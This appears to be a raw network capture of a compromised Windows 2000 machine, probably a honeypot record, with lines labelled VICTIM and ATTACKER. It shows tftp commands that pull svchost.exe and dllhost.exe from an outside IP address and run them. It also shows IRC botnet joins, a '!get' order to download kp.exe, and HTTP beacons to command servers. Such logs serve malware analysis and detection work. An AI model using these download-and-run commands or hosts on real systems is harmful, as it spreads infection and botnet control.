VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.
    C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\wins
    File Not Found
    C:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label.
    Volume Serial Number is F07B-A028
    Directory of C:\\WINNT\\system32\\dllcache
    File Not Found
    C:\\WINNT\\system32>
VICTIM: tftp -i 98.175.169.158 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29456 bytes in 4 seconds, 7364 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: tftp -i 98.175.169.158 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 3 seconds, 6656 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK zzetitue
    USER w020500 . . :-
VICTIM: Service Pack 2
    JOIN &virtu
ATTACKER: :u. PRIVMSG zzetitue :!get http:/yigeshabi.8800.org:2012/kp.exe
VICTIM: GET /kp.exe HTTP/1.0
    User-Agent: Download
    Host: yigeshabi.8800.org:2012
    Pragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B2969FEDCEBCA8B5FF8F6CEDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.1932794 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /myck.jpg?t=0.7755091 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: russia.9966.org:2011
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=647ADC3890000CA801EC56676B2EE013970C9FFAAF8BFB37D4B27C399A32EEB2176EA245A19FB39F81BC79131A0A907A4F851FF6399B3E1B6752B0183D914B25304FC56CEBEEBD22A79D3A403CD2F827B0473508532DE2E4A90B630EB15944304513858FACB773DF982B2CAB1D1D31AB6E99C0EF5A1DCEE9E1B8C7A864D2922C2B2164C761525F9AB88A1E4A4C8D93EC&t=0.428692 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=6B75EA0E76E6AB0FB5580F3E4702B94A41DA84E1DCF85E926503185D58F080DC80F982652816270B8CB1A3C93828DE34F3390CE566C45B7EA491C068369A620C651A3B92C8CDE6796B51B3C908E671AE28DF9DA0255BC7C164C6731E44ACC6B28FD9B5BF756E913D56E52DBBE61FEE66748178265605EBD9CBDFC2B7CD6FC832B3A3D1748BBD11D192A645113EFF0B8FAC76&t=0.5621149 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-51-70-2B&Publicer=100 HTTP/1.0
    User-Agent: CA 0.0.0.2
    Host: myck.nucleardiscover.com:88
ATTACKER: GET /ck3.jpg?t=0.9535944 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: russia.9966.org:2011
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=425C1FFBE373B42B5BB7C5E9531878C7118FDFE69CB91F88D7E598DD852B623851289E845A1A6D5DCFA98EE392A8ED0013DFAC1AB0DF6B435B6FD8A067E7D8B39BE4BDC101CE69F60B314C3601EFA47BE11669540876BBBD60C2E489F51D1A6E1147AAA0504B3C9051E23DBAE9E9C2580BFC614EBCFBC6E1C79E187718AE6DD3E4EED1720131BB732112DD88D213AC28&t=0.9405329 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /sn.php?c=1B052FCBFB6B31AEAC40163AB5FEF44BD7497D44092C9C0B3002B6F3D27C2B710A73DAC092D2A89898FE5F32B78D5CB1529EEC5A1D7241699BAF6B13D555B8D3A0DF601C25EA7AE583B97A00CF21D10EB94E685596E8080EB012EE83FF172054B6E03832554EC46816A56EF8EF167FF7847188D6B5E62D1FBBAF6411E143B04A647416B1032CE4243A0F7F27488ED4546C8C&t=0.4478571 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: w.nucleardiscover.com:888
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-51-70-2B&Publicer=100 HTTP/1.0
    User-Agent: CA 0.0.0.2
    Host: ck3.nucleardiscover.com:88
ATTACKER: GET / HTTP/1.0
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: voucherslunch.com
    Connection: Keep-Alive
ATTACKER: GET /ck4.jpg?t=0.8497888 HTTP/1.0
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)
    Host: russia.9966.org:2011
    Connection: Keep-Alive
    Pragma: no-cache
ATTACKER: GET /redirectExitTrack.php?d=voucherslunch.com&r=27&u=http%3A%2F%2Fas.casalemedia.com%2Fsd%3Fs%3D98198%26f%3D1 HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: voucherslunch.com
    Connection: Keep-Alive
    Cookie: GOSESSION=%7C1305661367.74%3A192.168.1.172%2C0; AAA=1
ATTACKER: GET /sd?s=98198&f=1 HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Connection: Keep-Alive
    Host: as.casalemedia.com
ATTACKER: GET /sd?s=98198&f=1&C=1 HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Cookie: CMID=@hfwjkPS1IgAAGW3B0UAAAA3; CMPS=091; CMPP=003
    Connection: Keep-Alive
    Host: as.casalemedia.com
ATTACKER: GET /vtrack.php?qry=6d7a499c8e5369692d26f5ba06ca4f110c116c501d86a15e09e5d35ef0d6fb54f7582902508e5c74d6d867fdb7d3183f HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: voucherslunch.com
    Connection: Keep-Alive
    Cookie: GOSESSION=%7C1305661367.74%3A192.168.1.172%2C0; AAA=1
ATTACKER: GET /nicheImages/270x26a/default.jpg HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: images.ddc.com
    Connection: Keep-Alive
ATTACKER: GET /nicheImages/60x22/default.jpg HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: images.ddc.com
    Connection: Keep-Alive
ATTACKER: GET /nicheImages/270x26b/default.jpg HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: images.ddc.com
    Connection: Keep-Alive
ATTACKER: GET /nicheImages/498x257/55.jpg HTTP/1.0
    Accept: */*
    Referer: http:/voucherslunch.com/
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: images.ddc.com
    Connection: Keep-Alive
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu